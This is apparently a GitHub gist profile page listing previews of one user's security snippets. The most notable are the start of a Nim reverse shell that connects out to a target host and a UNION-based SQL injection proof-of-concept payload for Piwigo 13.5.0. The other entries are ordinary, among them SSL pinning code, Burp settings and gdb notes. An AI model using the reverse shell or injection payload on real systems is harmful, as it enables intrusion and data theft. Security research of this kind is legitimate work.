Skip to content

Instantly share code, notes, and snippets.

View rodnt's full-sized avatar
:shipit:
see no evil ~ learning..

(0xz41) rodnt

:shipit:
see no evil ~ learning..
46 followers · 130 following
View GitHub Profile
@rodnt
rodnt / rvshell.nim
Created September 23, 2022 02:36
Reverse shell Linux Nim
import osproc, net
#Author: m4ll3k
var
sock = newSocket()
proc run(TARGET: string, RPORT: int): void =
try:
sock.connect(TARGET, PORT(RPORT))
@rodnt
rodnt / server.c
Created November 12, 2022 22:36
Simple C server for logging incoming connections.
#include <netdb.h>
/* --- server.c --- */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
@rodnt
rodnt / metricsDumper.rb
Created January 28, 2023 23:43
=begin
author: unp4ck
usage:
$ gem install http
$ ruby metricsDumper.rb -u https://example.com/prometheus
=end
@rodnt
rodnt / Playground.swift
Created February 11, 2023 18:41
Custom SSLPinning iOS
func urlSession(_ session: URLSession, didReceive challenge: URLAuthenticationChallenge, completionHandler: @escaping (URLSession.AuthChallengeDisposition, URLCredential?) -> Void) {
if (challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust) {
if let serverTrust = challenge.protectionSpace.serverTrust {
var secresult = SecTrustResultType.invalid
let status = SecTrustEvaluate(serverTrust, &secresult)
if (errSecSuccess == status) {
if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, 0) {
let serverCertificateData = SecCertificateCopyData(serverCertificate)
let data = CFDataGetBytePtr(serverCertificateData);
@rodnt
rodnt / proof.md
Created April 18, 2023 14:03
POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --

@rodnt
rodnt / gist:962a0382a15fec71755a23bd7ad8294d
Created April 21, 2023 14:06
TLS Pass Through (Burp Suite) invisible captcha issues and some anoy services
Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
*.google\.com
.*.gstatic).com
*.mozilla\.com
.*\.googleapis\.com
*.pkil.goog
@rodnt
rodnt / ds_store.py
Created July 12, 2023 21:36
Parser for .ds_store files
# -*- encoding: utf-8 -*-
from ds_store import DSStore
from tqdm import tqdm
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--path", help="Path to the DS_Store file", required=True)
parser.add_argument("-t", "--type", help="Type : Iloc, bwsp, lsvp, lsvP, icvp", default='Iloc')
args = parser.parse_args()
@rodnt
rodnt / gdb.md
Created September 11, 2023 10:36
gdb - basics

How to use GDB (Basics)

  • Load the program
    • gdb <program>
  • Run the program
    • run
    • run with arguments
      • run arga argb argc ..
  • Breakpoint
@rodnt
rodnt / pwntools-cheatsheet.md
Created September 17, 2023 21:02 — forked from anvbis/pwntools-cheatsheet.md
pwntools-cheatsheet.md
@rodnt
rodnt / win11Pendrive.sh
Created December 2, 2023 10:20
Windows 11 bootable pendrive script
#!/bin/bash
# Function to select the USB device
select_usb_device() {
echo "Available USB devices:"
local devices=(/dev/sd*)
select usb_device in "${devices[@]}"; do
if [ -z "$usb_device" ]; then
echo "Invalid selection, please try again."
else